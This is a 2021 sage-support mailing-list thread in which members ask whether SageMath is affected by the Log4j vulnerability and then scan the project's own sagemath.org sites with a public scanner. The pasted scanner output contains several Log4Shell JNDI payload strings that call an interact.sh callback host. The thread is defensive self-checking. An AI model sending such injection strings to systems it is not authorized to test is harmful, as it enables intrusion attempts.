Re: [sage-support] log4j

2021-12-14 Thread William Stein 
On Tue, Dec 14, 2021 at 2:25 PM Adil Hasan  wrote:

> Hello folks,
>
> In case you are concerned that you may be impacted by the Java log4j bug,
> you can download this application which will check if a supplied url is
> vulnerable to the bug:
>
> https://github.com/fullhunt/log4j-scan
>

Thanks.  It seems the sagemath.org infrastructure is in good shape
regarding this:

Last login: Tue Dec 14 16:45:00 on ttys058

wstein@max ~ % python3 log4j-scan.py -u https://ask.sagemath.org

/Library/Frameworks/Python.framework/Versions/3.10/bin/python3: can't open
file '/Users/wstein/log4j-scan.py': [Errno 2] No such file or directory

wstein@max ~ % cd /tmp/log4j-scan

wstein@max log4j-scan % python3 log4j-scan.py -u https://ask.sagemath.org

[•] CVE-2021-44228 - Apache Log4j RCE Scanner

[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface
Management Platform.

[•] Secure your External Attack Surface with FullHunt.io.

[•] Initiating DNS callback server (interact.sh).

[%] Checking for Log4j RCE CVE-2021-44228.

[•] URL: https://ask.sagemath.org

[•] URL: https://ask.sagemath.org | PAYLOAD: ${jndi:ldap://
ask.sagemath.org.9187j80iik2n4oq9ud1re041i81939unm.interact.sh/tjtni2c}

[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.

[•] Waiting...

[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan % python3 log4j-scan.py -u https://wiki.sagemath.org

[•] CVE-2021-44228 - Apache Log4j RCE Scanner

[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface
Management Platform.

[•] Secure your External Attack Surface with FullHunt.io.

[•] Initiating DNS callback server (interact.sh).

[%] Checking for Log4j RCE CVE-2021-44228.

[•] URL: https://wiki.sagemath.org

[•] URL: https://wiki.sagemath.org | PAYLOAD: ${jndi:ldap://
wiki.sagemath.org.5607rfj3i02047m4itt61pu684hsv539c.interact.sh/zpbgczb}

[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.

[•] Waiting...

[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan % python3 log4j-scan.py -u https://trac.sagemath.org

[•] CVE-2021-44228 - Apache Log4j RCE Scanner

[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface
Management Platform.

[•] Secure your External Attack Surface with FullHunt.io.

[•] Initiating DNS callback server (interact.sh).

[%] Checking for Log4j RCE CVE-2021-44228.

[•] URL: https://trac.sagemath.org

[•] URL: https://trac.sagemath.org | PAYLOAD: ${jndi:ldap://
trac.sagemath.org.xgge21465p6t46hq87n64t350054fg25o.interact.sh/kjy8og1}

[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.

[•] Waiting...

[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan % python3 log4j-scan.py -u https://www.sagemath.org

[•] CVE-2021-44228 - Apache Log4j RCE Scanner

[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface
Management Platform.

[•] Secure your External Attack Surface with FullHunt.io.

[•] Initiating DNS callback server (interact.sh).

[%] Checking for Log4j RCE CVE-2021-44228.

[•] URL: https://www.sagemath.org

[•] URL: https://www.sagemath.org | PAYLOAD: ${jndi:ldap://
www.sagemath.org.bx6i660og07o49v6qb2f9ou48r846433j.interact.sh/1qs7xvd}

[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.

[•] Waiting...

[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan %



-- 
William (http://wstein.org)

-- 
You received this message because you are subscribed to the Google Groups 
"sage-support" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to sage-support+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/sage-support/CACLE5GDuYX49_6yu%3DN67hw2n-c3Mqekrx0psECFT%3DDONp24g6g%40mail.gmail.com.

Re: [sage-support] log4j

2021-12-14 Thread Adil Hasan 
Hello folks,

In case you are concerned that you may be impacted by the Java log4j bug, you 
can download this application which will check if a supplied url is vulnerable 
to the bug:

https://github.com/fullhunt/log4j-scan 


Hth adil

> On 14 Dec 2021, at 22:10, Angela Hicks  wrote:
> 
> Thanks, William!
> Best,
> Angela
> 
> On Tue, Dec 14, 2021 at 4:54 PM William Stein  > wrote:
> I think that Sage doesn’t make any use of the JVM or Java so Sage is not 
> vulnerable to the log4j exploit. 
> 
> On Tue, Dec 14, 2021 at 6:47 AM Angela Hicks  > wrote:
> Has anyone more knowledgeable than I (admittedly a low bar) about sage's 
> internals (admittedly a low bar) thought about whether sage uses any 
> libraries that make it vulnerable to the log4j vulnerability?
> -Angela
> 
> -- 
> You received this message because you are subscribed to the Google Groups 
> "sage-support" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to sage-support+unsubscr...@googlegroups.com 
> .
> To view this discussion on the web visit 
> https://groups.google.com/d/msgid/sage-support/c944dbbe-d640-4a25-b9e8-9c0f0c13b437n%40googlegroups.com
>  
> .
> -- 
> -- William Stein
> 
> -- 
> You received this message because you are subscribed to a topic in the Google 
> Groups "sage-support" group.
> To unsubscribe from this topic, visit 
> https://groups.google.com/d/topic/sage-support/Rq6AzAS5G30/unsubscribe 
> .
> To unsubscribe from this group and all its topics, send an email to 
> sage-support+unsubscr...@googlegroups.com 
> .
> To view this discussion on the web visit 
> https://groups.google.com/d/msgid/sage-support/CACLE5GCkiYVthOOH3kCc3u2wv8VtGQg7y-fiZjDj%3Dvo20qdq_Q%40mail.gmail.com
>  
> .
> 
> -- 
> You received this message because you are subscribed to the Google Groups 
> "sage-support" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to sage-support+unsubscr...@googlegroups.com 
> .
> To view this discussion on the web visit 
> https://groups.google.com/d/msgid/sage-support/CABJmdsVheJcdHnUhKuFqkw%3DFaSHXTuHFzqS%3D%2Bm4-KNwTn58HUg%40mail.gmail.com
>  
> .

-- 
You received this message because you are subscribed to the Google Groups 
"sage-support" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to sage-support+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/sage-support/84E9DE0F-D3C5-40F9-BF42-114743A5C191%40gmail.com.

Re: [sage-support] log4j

2021-12-14 Thread Angela Hicks 
Thanks, William!
Best,
Angela

On Tue, Dec 14, 2021 at 4:54 PM William Stein  wrote:

> I think that Sage doesn’t make any use of the JVM or Java so Sage is not
> vulnerable to the log4j exploit.
>
> On Tue, Dec 14, 2021 at 6:47 AM Angela Hicks  wrote:
>
>> Has anyone more knowledgeable than I (admittedly a low bar) about sage's
>> internals (admittedly a low bar) thought about whether sage uses any
>> libraries that make it vulnerable to the log4j vulnerability?
>> -Angela
>>
>> --
>> You received this message because you are subscribed to the Google Groups
>> "sage-support" group.
>> To unsubscribe from this group and stop receiving emails from it, send an
>> email to sage-support+unsubscr...@googlegroups.com.
>> To view this discussion on the web visit
>> https://groups.google.com/d/msgid/sage-support/c944dbbe-d640-4a25-b9e8-9c0f0c13b437n%40googlegroups.com
>> 
>> .
>>
> --
> -- William Stein
>
> --
> You received this message because you are subscribed to a topic in the
> Google Groups "sage-support" group.
> To unsubscribe from this topic, visit
> https://groups.google.com/d/topic/sage-support/Rq6AzAS5G30/unsubscribe.
> To unsubscribe from this group and all its topics, send an email to
> sage-support+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/sage-support/CACLE5GCkiYVthOOH3kCc3u2wv8VtGQg7y-fiZjDj%3Dvo20qdq_Q%40mail.gmail.com
> 
> .
>

-- 
You received this message because you are subscribed to the Google Groups 
"sage-support" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to sage-support+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/sage-support/CABJmdsVheJcdHnUhKuFqkw%3DFaSHXTuHFzqS%3D%2Bm4-KNwTn58HUg%40mail.gmail.com.

Re: [sage-support] log4j

2021-12-14 Thread William Stein 
I think that Sage doesn’t make any use of the JVM or Java so Sage is not
vulnerable to the log4j exploit.

On Tue, Dec 14, 2021 at 6:47 AM Angela Hicks  wrote:

> Has anyone more knowledgeable than I (admittedly a low bar) about sage's
> internals (admittedly a low bar) thought about whether sage uses any
> libraries that make it vulnerable to the log4j vulnerability?
> -Angela
>
> --
> You received this message because you are subscribed to the Google Groups
> "sage-support" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to sage-support+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/sage-support/c944dbbe-d640-4a25-b9e8-9c0f0c13b437n%40googlegroups.com
> 
> .
>
-- 
-- William Stein

-- 
You received this message because you are subscribed to the Google Groups 
"sage-support" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to sage-support+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/sage-support/CACLE5GCkiYVthOOH3kCc3u2wv8VtGQg7y-fiZjDj%3Dvo20qdq_Q%40mail.gmail.com.

[sage-support] log4j

2021-12-14 Thread Angela Hicks 
Has anyone more knowledgeable than I (admittedly a low bar) about sage's 
internals (admittedly a low bar) thought about whether sage uses any 
libraries that make it vulnerable to the log4j vulnerability?
-Angela

-- 
You received this message because you are subscribed to the Google Groups 
"sage-support" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to sage-support+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/sage-support/c944dbbe-d640-4a25-b9e8-9c0f0c13b437n%40googlegroups.com.